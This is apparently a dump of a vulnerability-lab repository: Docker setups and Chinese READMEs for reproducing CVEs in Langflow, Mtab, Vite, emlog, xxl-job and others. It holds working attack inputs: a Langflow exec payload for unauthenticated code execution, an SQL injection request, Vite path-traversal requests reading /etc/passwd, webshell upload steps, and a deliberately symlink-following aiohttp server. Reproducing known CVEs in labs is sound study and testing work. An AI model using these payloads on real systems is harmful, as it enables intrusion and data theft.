/ZenTao/ZenTaoPMS/QVD-2024-15263/4.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Shelter1234/VulneraLab/5b1dcfc983746b91d52643d2dcea7eb21e94af76/ZenTao/ZenTaoPMS/QVD-2024-15263/4.png
--------------------------------------------------------------------------------
/ZenTao/ZenTaoPMS/QVD-2024-15263/5.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Shelter1234/VulneraLab/5b1dcfc983746b91d52643d2dcea7eb21e94af76/ZenTao/ZenTaoPMS/QVD-2024-15263/5.png
--------------------------------------------------------------------------------
/ZenTao/ZenTaoPMS/QVD-2024-15263/6.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Shelter1234/VulneraLab/5b1dcfc983746b91d52643d2dcea7eb21e94af76/ZenTao/ZenTaoPMS/QVD-2024-15263/6.png
--------------------------------------------------------------------------------
/ZenTao/ZenTaoPMS/QVD-2024-15263/7.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Shelter1234/VulneraLab/5b1dcfc983746b91d52643d2dcea7eb21e94af76/ZenTao/ZenTaoPMS/QVD-2024-15263/7.png
--------------------------------------------------------------------------------
/aiohttp/CVE-2024-23334/Dockerfile:
--------------------------------------------------------------------------------
1 |
2 | FROM python:3.12-slim
3 |
4 | WORKDIR /web
5 | COPY web/ /web
6 |
7 | RUN pip install --upgrade pip
8 | RUN pip install aiohttp==3.9.1
9 | EXPOSE 8080
10 |
11 | CMD python3 aiohttpServer.py && tail -f /dev/null
12 |
--------------------------------------------------------------------------------
/aiohttp/CVE-2024-23334/docker-compose.yml:
--------------------------------------------------------------------------------
1 | version: '3'
2 | services:
3 | python_web:
4 | build: .
5 | container_name: aiohttp-v3.9.1-web
6 |
7 | ports:
8 | - "8080:8080"
9 |
10 |
--------------------------------------------------------------------------------
/aiohttp/CVE-2024-23334/web/aiohttpServer.py:
--------------------------------------------------------------------------------
1 | from aiohttp import web
2 |
3 | async def index(request):
4 | return web.Response(text="Hello, World!")
5 |
6 | app = web.Application()
7 | app.router.add_routes([
8 | web.static("/static", "static/", follow_symlinks=True),
9 | ])
10 | app.router.add_get('/', index)
11 |
12 | if __name__ == '__main__':
13 | web.run_app(app, host='0.0.0.0', port=8080)
14 |
--------------------------------------------------------------------------------
/codeastro/Membership Management System/CVE-2024-25869/1.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Shelter1234/VulneraLab/5b1dcfc983746b91d52643d2dcea7eb21e94af76/codeastro/Membership Management System/CVE-2024-25869/1.png
--------------------------------------------------------------------------------
/codeastro/Membership Management System/CVE-2024-25869/2.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Shelter1234/VulneraLab/5b1dcfc983746b91d52643d2dcea7eb21e94af76/codeastro/Membership Management System/CVE-2024-25869/2.png
--------------------------------------------------------------------------------
/codeastro/Membership Management System/CVE-2024-25869/3.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Shelter1234/VulneraLab/5b1dcfc983746b91d52643d2dcea7eb21e94af76/codeastro/Membership Management System/CVE-2024-25869/3.png
--------------------------------------------------------------------------------
/codeastro/Membership Management System/CVE-2024-25869/README.zh-cn.md:
--------------------------------------------------------------------------------
1 | # Membership Management System-不受限制的文件上传到RCE漏洞(CVE-2024-25869)
2 |
3 | 一个基于会员管理系统的功能齐全的项目,使用 PHP 语言和 MySQL 数据库。特别是,这个基于 PHP 的会员系统提供了一个包罗万象的套件。它熟练地处理会员类型、会员、收入的流程,并简化会员卡流程。它具有多种功能,允许用户管理和跟踪会员记录。
4 |
5 | 此漏洞的存在使未经身份验证的攻击者能够将.php文件上载到Web服务器,并在运行应用程序的用户的权限下执行代码。
6 |
7 | 源码地址https://codeastro.com/membership-management-system-in-php-with-source-code/
8 |
9 | 参考链接:
10 |
11 | - https://github.com/0xQRx/VulnerabilityResearch/blob/master/2024/MembershipManagementSystem-Unrestricted_Fileupload.md
12 |
13 | ## 漏洞环境
14 |
15 |
16 |
17 | 执行如下命令启动一个Membership -web:
18 |
19 | ```
20 | docker compose up -d
21 | ```
22 |
23 | 环境启动后,访问`http://your-ip:80`即可跳转到Membership 登录页面
24 |
25 |
26 |
27 | ## 漏洞复现
28 |
29 | 1. 使用用户及密码 admin@mail.com:admin 登录系统
30 |
31 | 
32 |
33 | 2. 进入设置页面上传logo 为shell.php,点击Updata Settings
34 |
35 | 
36 |
37 | 3. 访问地址 /uploads/shell.php
38 |
39 | 
40 |
--------------------------------------------------------------------------------
/codeastro/Membership Management System/CVE-2024-25869/docker-compose.yml:
--------------------------------------------------------------------------------
1 | version: '3'
2 | services:
3 | php_web:
4 | image: shelter2024/membership-v1-web
5 | container_name: membershiphp-web
6 | depends_on:
7 | - mysql
8 | ports:
9 | - "80:80"
10 | mysql:
11 | image: mysql:5.7
12 | container_name: membershiphp-web-mysql
13 | environment:
14 | - MYSQL_ROOT_PASSWORD=root
15 | - MYSQL_DATABASE=membershiphp
16 | volumes:
17 | - ./membershiphp.sql:/docker-entrypoint-initdb.d/init.sql
18 |
--------------------------------------------------------------------------------
/craftcms/CVE-2023-41892/1.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Shelter1234/VulneraLab/5b1dcfc983746b91d52643d2dcea7eb21e94af76/craftcms/CVE-2023-41892/1.png
--------------------------------------------------------------------------------
/craftcms/CVE-2023-41892/2.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Shelter1234/VulneraLab/5b1dcfc983746b91d52643d2dcea7eb21e94af76/craftcms/CVE-2023-41892/2.png
--------------------------------------------------------------------------------
/craftcms/CVE-2023-41892/3.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Shelter1234/VulneraLab/5b1dcfc983746b91d52643d2dcea7eb21e94af76/craftcms/CVE-2023-41892/3.png
--------------------------------------------------------------------------------
/craftcms/CVE-2023-41892/4.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Shelter1234/VulneraLab/5b1dcfc983746b91d52643d2dcea7eb21e94af76/craftcms/CVE-2023-41892/4.png
--------------------------------------------------------------------------------
/craftcms/CVE-2023-41892/docker-compose.yml:
--------------------------------------------------------------------------------
1 | version: '3'
2 | services:
3 | php_web:
4 | image: shelter2024/craft-cms-4-4-11-web
5 | container_name: craft-cms-4-4-11-web
6 | depends_on:
7 | - mysql
8 | ports:
9 | - "8080:8080"
10 | mysql:
11 | image: mysql:5.7
12 | container_name: craft-cms-4-4-11-web-mysql
13 | environment:
14 | - MYSQL_ROOT_PASSWORD=root
15 | - MYSQL_DATABASE=craftcms
16 |
--------------------------------------------------------------------------------
/emlog/CVE-2024-33752/1.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Shelter1234/VulneraLab/5b1dcfc983746b91d52643d2dcea7eb21e94af76/emlog/CVE-2024-33752/1.png
--------------------------------------------------------------------------------
/emlog/CVE-2024-33752/2.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Shelter1234/VulneraLab/5b1dcfc983746b91d52643d2dcea7eb21e94af76/emlog/CVE-2024-33752/2.png
--------------------------------------------------------------------------------
/emlog/CVE-2024-33752/3.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Shelter1234/VulneraLab/5b1dcfc983746b91d52643d2dcea7eb21e94af76/emlog/CVE-2024-33752/3.png
--------------------------------------------------------------------------------
/emlog/CVE-2024-33752/README.zh-cn.md:
--------------------------------------------------------------------------------
1 | # emlog后台插件文件上传漏洞
2 |
3 | emlog是一个基于PHP和MYSQL的快速稳定的轻量级博客及CMS建站系统。在emlog pro项目中,有一个可以上传的zip的接口在admin/views/plugin.php,解压之后并没有对内容进行任何的过滤和分析,这样就可以用php上传一个压缩文件,通过解压上传到服务器,从而getshell。
4 |
5 | **影响版本**:emlog pro 2.3.x
6 |
7 | **项目地址**:https://github.com/emlog/emlog
8 |
9 | 参考链接:
10 |
11 | - https://github.com/Myanemo/emlogpro/blob/main/emlog%20pro2.3.2%20File%20upload%20to%20getshell.md
12 |
13 | ## 漏洞环境
14 |
15 | 执行如下命令启动一个mlog-pro-v2.3.2-web服务:
16 |
17 | ```
18 | docker compose up
19 | ```
20 |
21 | 服务启动后,访问`http://your-ip:80/`即可跳转到到mlog安装向导界面。
22 |
23 | 
24 |
25 | ## 漏洞复现
26 |
27 | 1.登录后台,点击“插件-安装插件-选择文件”上传制作好的zip文件。
28 |
29 | 
30 |
31 | 2.成功上传插件后访问`http://192.168.76.128/content/plugins/test/test.php`
32 |
33 | 
--------------------------------------------------------------------------------
/emlog/CVE-2024-33752/docker-compose.yml:
--------------------------------------------------------------------------------
1 | version: '3'
2 | services:
3 | php_web:
4 | image: shelter2024/mlog-pro-v2.3.2-web
5 | container_name: emlog-pro-2.3.2-web
6 | depends_on:
7 | - mysql
8 | environment:
9 | EMLOG_DB_HOST: mysql
10 | EMLOG_DB_USER: emlog
11 | EMLOG_DB_NAME: emlog
12 | EMLOG_DB_PASSWORD: emlog
13 | ports:
14 | - "5506:3306"
15 | - "80:80"
16 | # volumes:
17 | # - ./apache-config:/etc/apache2/sites-available
18 | mysql:
19 | image: mysql:5.7
20 | container_name: emlog-pro-2.3.2-mysql
21 | command:
22 | - --character-set-server=utf8mb4
23 | - --collation-server=utf8mb4_unicode_ci
24 | environment:
25 | MYSQL_ROOT_PASSWORD: root
26 | MYSQL_DATABASE: emlog
27 | MYSQL_USER: emlog
28 | MYSQL_PASSWORD: emlog
29 | # volumes:
30 | # - .:/docker-entrypoint-initdb.d/init.sql
31 |
--------------------------------------------------------------------------------
/emlog/CVE-2024-33752/test.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Shelter1234/VulneraLab/5b1dcfc983746b91d52643d2dcea7eb21e94af76/emlog/CVE-2024-33752/test.zip
--------------------------------------------------------------------------------
/langflow/CVE-2025-3248/1.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Shelter1234/VulneraLab/5b1dcfc983746b91d52643d2dcea7eb21e94af76/langflow/CVE-2025-3248/1.png
--------------------------------------------------------------------------------
/langflow/CVE-2025-3248/2.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Shelter1234/VulneraLab/5b1dcfc983746b91d52643d2dcea7eb21e94af76/langflow/CVE-2025-3248/2.png
--------------------------------------------------------------------------------
/langflow/CVE-2025-3248/README.zh-cn.md:
--------------------------------------------------------------------------------
1 | # Langflow 远程代码执行漏洞(CVE-2025-3248)
2 |
3 | LangFlow是一个针对LangChain的GUI,它采用了反应流设计,提供了一种轻松的方式,通过拖放组件和聊天框来实验和原型化流程,将llm嵌入到您的应用程序中。2025年4月,互联网上披露CVE-2025-3248 Langflow code 代码执行漏洞,攻击者可在无需登陆的情况下执行代码,控制服务器。
4 |
5 | 项目地址 https://github.com/langflow-ai/langflow/
6 |
7 | 影响版本:<1.3.0
8 |
9 | 参考链接:
10 |
11 | - https://www.horizon3.ai/attack-research/disclosures/unsafe-at-any-speed-abusing-python-exec-for-unauth-rce-in-langflow-ai/
12 |
13 | ## 漏洞环境
14 |
15 | 执行如下命令启动一个langflow:1.2.0服务:
16 |
17 | ```
18 | docker compose up
19 | ```
20 |
21 | 服务启动后,可访问`http://your-ip:7860/`
22 |
23 | 
24 |
25 | ## 漏洞复现
26 |
27 | ```
28 | POST /api/v1/validate/code HTTP/1.1
29 | Host: 192.168.76.128:7860
30 | Content-Type: application/json
31 | Content-Length: 122
32 |
33 | {"code": "def exploit(cmd=exec('raise Exception(__import__(\"subprocess\").check_output(\"id\",shell=True))')):\n\n pass"}
34 | ```
35 |
36 | 
37 |
38 |
--------------------------------------------------------------------------------
/langflow/CVE-2025-3248/docker-compose.yml:
--------------------------------------------------------------------------------
1 | services:
2 | langflow:
3 | image: langflowai/langflow:1.2.0 # or another version tag on https://hub.docker.com/r/langflowai/langflow
4 | pull_policy: always # set to 'always' when using 'latest' image
5 | ports:
6 | - "7860:7860"
7 | depends_on:
8 | - postgres
9 | environment:
10 | - LANGFLOW_DATABASE_URL=postgresql://langflow:langflow@postgres:5432/langflow
11 | # This variable defines where the logs, file storage, monitor data and secret keys are stored.
12 | - LANGFLOW_CONFIG_DIR=app/langflow
13 | volumes:
14 | - langflow-data:/app/langflow
15 |
16 | postgres:
17 | image: postgres:16
18 | environment:
19 | POSTGRES_USER: langflow
20 | POSTGRES_PASSWORD: langflow
21 | POSTGRES_DB: langflow
22 | ports:
23 | - "5432:5432"
24 | volumes:
25 | - langflow-postgres:/var/lib/postgresql/data
26 |
27 | volumes:
28 | langflow-postgres:
29 | langflow-data:
30 |
--------------------------------------------------------------------------------
/likeshop/CVE-2024-0352/1.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Shelter1234/VulneraLab/5b1dcfc983746b91d52643d2dcea7eb21e94af76/likeshop/CVE-2024-0352/1.png
--------------------------------------------------------------------------------
/likeshop/CVE-2024-0352/docker-compose.yml:
--------------------------------------------------------------------------------
1 | version: '3'
2 | services:
3 | php_web:
4 | image: shelter2024/likeshop-v2.5.7-web
5 | container_name: likeshop-v2.5.7-web
6 | depends_on:
7 | - mysql
8 | ports:
9 | - "80:8000"
10 |
11 | mysql:
12 | image: mysql:5.7
13 | container_name: likeshop-v2.5.7-web-mysql
14 | environment:
15 | - MYSQL_ROOT_PASSWORD=root
16 | ports:
17 | - 3306:3306
18 |
19 |
--------------------------------------------------------------------------------
/mtab/mtab-v2.1.0-sqli/1.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Shelter1234/VulneraLab/5b1dcfc983746b91d52643d2dcea7eb21e94af76/mtab/mtab-v2.1.0-sqli/1.png
--------------------------------------------------------------------------------
/mtab/mtab-v2.1.0-sqli/2.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Shelter1234/VulneraLab/5b1dcfc983746b91d52643d2dcea7eb21e94af76/mtab/mtab-v2.1.0-sqli/2.png
--------------------------------------------------------------------------------
/mtab/mtab-v2.1.0-sqli/3.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Shelter1234/VulneraLab/5b1dcfc983746b91d52643d2dcea7eb21e94af76/mtab/mtab-v2.1.0-sqli/3.png
--------------------------------------------------------------------------------
/mtab/mtab-v2.1.0-sqli/README.zh-cn.md:
--------------------------------------------------------------------------------
1 | # Mtab书签导航程序 v2.1.0 SQL注入漏洞
2 |
3 | Mtab书签导航程序 - 免费无广告的浏览器书签助手,多端同步、美观易用的在 线导航和书签工具,自主研发免费使用,帮助您高效管理 网页和应用,提升在线体验。
4 | Mtab书签导航程序 LinkStore/getIcon 接口存在SQL注入漏洞,未经身份验证的远程攻击者除了可以利用 SQL 注入漏洞获取数据库中的信息(例如,管理员后台密码、站点的用户个人信息)之外,甚至在高权限的情况可向服务器中写入木马,进一步获取服务器系统权限。
5 |
6 | 漏洞影响版本
7 |
8 | Mtab <= v2.1.0
9 |
10 | 产品项目地址
11 |
12 | https://github.com/tsxcw/mtab
13 |
14 | 参考链接:
15 |
16 | - https://forum.butian.net/article/539
17 |
18 | ## 环境搭建
19 |
20 | 执行如下命令启动Mtab-v2.1.0程序web
21 |
22 | ```
23 | docker compose up
24 | ```
25 |
26 | 环境启动后,访问`http://your-ip:80`将看到Mtab的安装向导页面,安装配置如下图
27 |
28 | 
29 |
30 | 等待安装完成
31 |
32 | 
33 |
34 | ## 漏洞复现
35 |
36 | 发送如下数据包
37 |
38 | ```
39 | POST /LinkStore/list HTTP/1.1
40 | Host: 192.168.76.128
41 | Content-Length: 78
42 | Content-Type: application/json
43 |
44 | {"url":"1' and (updatexml(1,concat(0x7e,(select user()),0x7e),1)) and '1'='1"}
45 | ```
46 |
47 | 
48 |
49 |
--------------------------------------------------------------------------------
/mtab/mtab-v2.1.0-sqli/docker-compose.yml:
--------------------------------------------------------------------------------
1 | version: '3'
2 | services:
3 | php_web:
4 | image: itushan/mtab:2.1.0
5 | container_name: mtab-2.1.0-web
6 | depends_on:
7 | - mysql
8 | ports:
9 | - "3306:3306"
10 | - "80:80"
11 | mysql:
12 | image: mysql:5.7
13 | container_name: mtab-2.1.0-web-mysql
14 | environment:
15 | MYSQL_ROOT_PASSWORD: root
16 | MYSQL_DATABASE: mtab
17 | volumes:
18 | - ./install.sql:/docker-entrypoint-initdb.d/init.sql
19 |
--------------------------------------------------------------------------------
/nginx-ui/CVE-2024-23827/docker-compose.yml:
--------------------------------------------------------------------------------
1 | version: '3'
2 | services:
3 | go_web:
4 | image: shelter2024/nginx-ui-v2.0.0-beta.10-web
5 | container_name: nginx-ui-v2.0.0-beta.10-web
6 | ports:
7 | - "80:9000"
8 |
--------------------------------------------------------------------------------
/ruoyi/RuoYi后台管理系统/ruoyi-rytask-any-reflection-call-rce/1.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Shelter1234/VulneraLab/5b1dcfc983746b91d52643d2dcea7eb21e94af76/ruoyi/RuoYi后台管理系统/ruoyi-rytask-any-reflection-call-rce/1.png
--------------------------------------------------------------------------------
/ruoyi/RuoYi后台管理系统/ruoyi-rytask-any-reflection-call-rce/2.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Shelter1234/VulneraLab/5b1dcfc983746b91d52643d2dcea7eb21e94af76/ruoyi/RuoYi后台管理系统/ruoyi-rytask-any-reflection-call-rce/2.png
--------------------------------------------------------------------------------
/ruoyi/RuoYi后台管理系统/ruoyi-rytask-any-reflection-call-rce/3.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Shelter1234/VulneraLab/5b1dcfc983746b91d52643d2dcea7eb21e94af76/ruoyi/RuoYi后台管理系统/ruoyi-rytask-any-reflection-call-rce/3.png
--------------------------------------------------------------------------------
/ruoyi/RuoYi后台管理系统/ruoyi-rytask-any-reflection-call-rce/docker-compose.yml:
--------------------------------------------------------------------------------
1 | version: '3'
2 | services:
3 | spring_web:
4 | image: shelter2024/ruoyi-v4.6.2-web
5 | container_name: ruoyi-v4.6.2-web
6 | depends_on:
7 | - mysql
8 | ports:
9 | - "80:80"
10 | # volumes:
11 | # - ./www:/var/www/html
12 | # command: bash -c "chmod -R 777 /var/www/html && /usr/sbin/apache2ctl -D FOREGROUND"
13 | mysql:
14 | image: mysql:5.7
15 | container_name: ruoyi-v4.6.2-web-mysql
16 | environment:
17 | - MYSQL_ROOT_PASSWORD=root
18 | - MYSQL_DATABASE=ry
19 | - MYSQL_CHARSET=utf8mb4
20 | ports:
21 | - 3306:3306
22 |
23 | volumes:
24 | - ./ry_20210210.sql:/docker-entrypoint-initdb.d/init.sql
25 |
--------------------------------------------------------------------------------
/sonatype/nexus3/CVE-2024-4956/1.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Shelter1234/VulneraLab/5b1dcfc983746b91d52643d2dcea7eb21e94af76/sonatype/nexus3/CVE-2024-4956/1.png
--------------------------------------------------------------------------------
/sonatype/nexus3/CVE-2024-4956/2.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Shelter1234/VulneraLab/5b1dcfc983746b91d52643d2dcea7eb21e94af76/sonatype/nexus3/CVE-2024-4956/2.png
--------------------------------------------------------------------------------
/spring/MongoDB/CVE-2022-22980/1.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Shelter1234/VulneraLab/5b1dcfc983746b91d52643d2dcea7eb21e94af76/spring/MongoDB/CVE-2022-22980/1.png
--------------------------------------------------------------------------------
/spring/MongoDB/CVE-2022-22980/docker-compose.yml:
--------------------------------------------------------------------------------
1 | version: '3'
2 | services:
3 | java_web:
4 | image: shelter2024/spring-data-mongodb-demo-web
5 | container_name: spring-data-mongodb-web
6 | ports:
7 | - "8080:8080"
--------------------------------------------------------------------------------
/vite/CVE-2025-30208/1.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Shelter1234/VulneraLab/5b1dcfc983746b91d52643d2dcea7eb21e94af76/vite/CVE-2025-30208/1.png
--------------------------------------------------------------------------------
/vite/CVE-2025-30208/README.zh-cn.md:
--------------------------------------------------------------------------------
1 | # Vite任意文件读取漏洞(CVE-2025-30208)
2 |
3 |
4 | Vite 是一家前端开发工具提供商,在 6.2.3、6.1.2、6.0.12、5.4.15 和 4.5.10 之前的版本中存在漏洞。`@fs` 会拒绝访问 Vite 服务允许列表之外的文件。在 URL 中添加 `?raw??` 或 `?import&raw??` 可绕过此限制并返回文件内容(如果存在)。之所以存在这种绕过漏洞,是因为在多个位置删除了诸如 `?` 之类的尾部分隔符,但在查询字符串正则表达式中并未考虑这些分隔符。任意文件的内容都可以返回到浏览器。只有明确将 Vite 开发服务器暴露给网络(使用 `--host` 或 `server.host` 配置选项)的应用程序才会受到影响。6.2.3、6.1.2、6.0.12、5.4.15 和 4.5.10 版本已修复此问题。
5 |
6 | 漏洞影响版本
7 | 6.2.0 >= Vite <=6.2.2
8 | 6.1.0 >= Vite <=6.1.1
9 | 6.0.0 >= Vite <=6.0.11
10 | 5.0.0 >= Vite <=5.4.14
11 | Vite <=4.5.9
12 |
13 | 项目地址
14 | https://github.com/vitejs/vite
15 |
16 | 参考链接:
17 |
18 | - https://nvd.nist.gov/vuln/detail/CVE-2025-30208
19 |
20 | ## 环境搭建
21 |
22 | 执行如下命令启动前端项目vite-v5-4-5-web
23 |
24 | ```
25 | docker compose up
26 | ```
27 |
28 | 环境启动后,访问`http://your-ip:5173`,404 http响应正常 ,服务器环境已经搭好
29 |
30 | ## 漏洞复现
31 |
32 | GET /@fs/etc/passwd?import&?inline=1.wasm?init HTTP/1.1
33 | GET /@fs/etc/passwd?import&raw? HTTP/1.1
34 |
35 | 
36 |
--------------------------------------------------------------------------------
/vite/CVE-2025-30208/docker-compose.yml:
--------------------------------------------------------------------------------
1 | version: '3'
2 | services:
3 | node_web:
4 | image: shelter2024/vite-v5-4-5-web
5 | container_name: vite-v5-4-5-web
6 | ports:
7 | - "5173:5173"
8 | command: /bin/bash -c "cd /app && npx vite --host" # 启动命令
9 |
10 |
--------------------------------------------------------------------------------
/xwiki-platform/CVE-2025-24893/1.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Shelter1234/VulneraLab/5b1dcfc983746b91d52643d2dcea7eb21e94af76/xwiki-platform/CVE-2025-24893/1.png
--------------------------------------------------------------------------------
/xwiki-platform/CVE-2025-24893/2.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Shelter1234/VulneraLab/5b1dcfc983746b91d52643d2dcea7eb21e94af76/xwiki-platform/CVE-2025-24893/2.png
--------------------------------------------------------------------------------
/xwiki-platform/CVE-2025-24893/3.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Shelter1234/VulneraLab/5b1dcfc983746b91d52643d2dcea7eb21e94af76/xwiki-platform/CVE-2025-24893/3.png
--------------------------------------------------------------------------------
/xwiki-platform/CVE-2025-24893/init.sql:
--------------------------------------------------------------------------------
1 | grant all privileges on *.* to xwiki@'%'
--------------------------------------------------------------------------------
/xxl-job/xxl-job-v2.0.2-hessian2-deserialization-rce/1.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Shelter1234/VulneraLab/5b1dcfc983746b91d52643d2dcea7eb21e94af76/xxl-job/xxl-job-v2.0.2-hessian2-deserialization-rce/1.png
--------------------------------------------------------------------------------
/xxl-job/xxl-job-v2.0.2-hessian2-deserialization-rce/2.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Shelter1234/VulneraLab/5b1dcfc983746b91d52643d2dcea7eb21e94af76/xxl-job/xxl-job-v2.0.2-hessian2-deserialization-rce/2.png
--------------------------------------------------------------------------------
/xxl-job/xxl-job-v2.0.2-hessian2-deserialization-rce/3.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Shelter1234/VulneraLab/5b1dcfc983746b91d52643d2dcea7eb21e94af76/xxl-job/xxl-job-v2.0.2-hessian2-deserialization-rce/3.png
--------------------------------------------------------------------------------
/xxl-job/xxl-job-v2.0.2-hessian2-deserialization-rce/4.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Shelter1234/VulneraLab/5b1dcfc983746b91d52643d2dcea7eb21e94af76/xxl-job/xxl-job-v2.0.2-hessian2-deserialization-rce/4.png
--------------------------------------------------------------------------------
/xxl-job/xxl-job-v2.0.2-hessian2-deserialization-rce/README.zh-cn.md:
--------------------------------------------------------------------------------
1 | # xxl-job v2.0.2 Hessian2反序列化漏洞
2 |
3 | XXL-JOB在2.0.2及以下版本中的接口/xxl-job-admin/api 存在未授权访问漏洞,该接口会进行Hessian2反序列化操作,导致存在Hessian2反序列化漏洞从而RCE。
4 |
5 | 项目开源地址:https://github.com/xuxueli/xxl-job
6 |
7 | 参考链接:
8 |
9 | ## 环境搭建
10 |
11 | 执行如下命令启动一个包含漏洞的xxl-job v2.0.2环境:
12 |
13 | ```
14 | docker compose up -d
15 | ```
16 |
17 | 
18 |
19 | ## 漏洞复现
20 |
21 | 恶意序列化执行类示例
22 |
23 | 
24 |
25 | burp向/xxl-job-admin/api POST发包 body体为 SwingLazyValue.hessian文件(注意要raw格式)
26 |
27 | 
28 |
29 | 发送序列化数据发送后进入docker内验证命令执行的结果。
30 |
31 | 
--------------------------------------------------------------------------------
/xxl-job/xxl-job-v2.0.2-hessian2-deserialization-rce/SwingLazyValue.hessian:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Shelter1234/VulneraLab/5b1dcfc983746b91d52643d2dcea7eb21e94af76/xxl-job/xxl-job-v2.0.2-hessian2-deserialization-rce/SwingLazyValue.hessian
--------------------------------------------------------------------------------
/xxl-job/xxl-job-v2.0.2-hessian2-deserialization-rce/docker-compose.yml:
--------------------------------------------------------------------------------
1 | version: '3'
2 | services:
3 | spring_web:
4 | image: shelter2024/shelter2024/xxl-job-v2.0.2-web
5 | container_name: xxl-job-web
6 | environment:
7 | SPRING_DATASOURCE_URL: jdbc:mysql://mysql:3306/xxl-job?useUnicode=true&characterEncoding=utf8&useSSL=false
8 | depends_on:
9 | - mysql
10 | ports:
11 | - "8088:8088"
12 |
13 | mysql:
14 | image: mysql:5.7
15 | container_name: xxl-job-web-mysql
16 | environment:
17 | - MYSQL_ROOT_PASSWORD=root
18 | - MYSQL_DATABASE=xxl-job
19 | ports:
20 | - "3306:3306"
21 | volumes:
22 | - ./tables_xxl_job.sql:/docker-entrypoint-initdb.d/init.sql
23 |
--------------------------------------------------------------------------------
/yeswiki/CVE-2025-31131/1.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Shelter1234/VulneraLab/5b1dcfc983746b91d52643d2dcea7eb21e94af76/yeswiki/CVE-2025-31131/1.png
--------------------------------------------------------------------------------
/yeswiki/CVE-2025-31131/2.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Shelter1234/VulneraLab/5b1dcfc983746b91d52643d2dcea7eb21e94af76/yeswiki/CVE-2025-31131/2.png
--------------------------------------------------------------------------------
/yeswiki/CVE-2025-31131/3.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Shelter1234/VulneraLab/5b1dcfc983746b91d52643d2dcea7eb21e94af76/yeswiki/CVE-2025-31131/3.png
--------------------------------------------------------------------------------
/zzzCMS/CVE-2023-45554/1.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Shelter1234/VulneraLab/5b1dcfc983746b91d52643d2dcea7eb21e94af76/zzzCMS/CVE-2023-45554/1.png
--------------------------------------------------------------------------------
/zzzCMS/CVE-2023-45554/10.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Shelter1234/VulneraLab/5b1dcfc983746b91d52643d2dcea7eb21e94af76/zzzCMS/CVE-2023-45554/10.png
--------------------------------------------------------------------------------
/zzzCMS/CVE-2023-45554/11.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Shelter1234/VulneraLab/5b1dcfc983746b91d52643d2dcea7eb21e94af76/zzzCMS/CVE-2023-45554/11.png
--------------------------------------------------------------------------------
/zzzCMS/CVE-2023-45554/2.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Shelter1234/VulneraLab/5b1dcfc983746b91d52643d2dcea7eb21e94af76/zzzCMS/CVE-2023-45554/2.png
--------------------------------------------------------------------------------
/zzzCMS/CVE-2023-45554/3.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Shelter1234/VulneraLab/5b1dcfc983746b91d52643d2dcea7eb21e94af76/zzzCMS/CVE-2023-45554/3.png
--------------------------------------------------------------------------------
/zzzCMS/CVE-2023-45554/4.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Shelter1234/VulneraLab/5b1dcfc983746b91d52643d2dcea7eb21e94af76/zzzCMS/CVE-2023-45554/4.png
--------------------------------------------------------------------------------
/zzzCMS/CVE-2023-45554/5.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Shelter1234/VulneraLab/5b1dcfc983746b91d52643d2dcea7eb21e94af76/zzzCMS/CVE-2023-45554/5.png
--------------------------------------------------------------------------------
/zzzCMS/CVE-2023-45554/6.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Shelter1234/VulneraLab/5b1dcfc983746b91d52643d2dcea7eb21e94af76/zzzCMS/CVE-2023-45554/6.png
--------------------------------------------------------------------------------
/zzzCMS/CVE-2023-45554/7.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Shelter1234/VulneraLab/5b1dcfc983746b91d52643d2dcea7eb21e94af76/zzzCMS/CVE-2023-45554/7.png
--------------------------------------------------------------------------------
/zzzCMS/CVE-2023-45554/8.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Shelter1234/VulneraLab/5b1dcfc983746b91d52643d2dcea7eb21e94af76/zzzCMS/CVE-2023-45554/8.png
--------------------------------------------------------------------------------
/zzzCMS/CVE-2023-45554/9.png:
--------------------------------------------------------------------------------
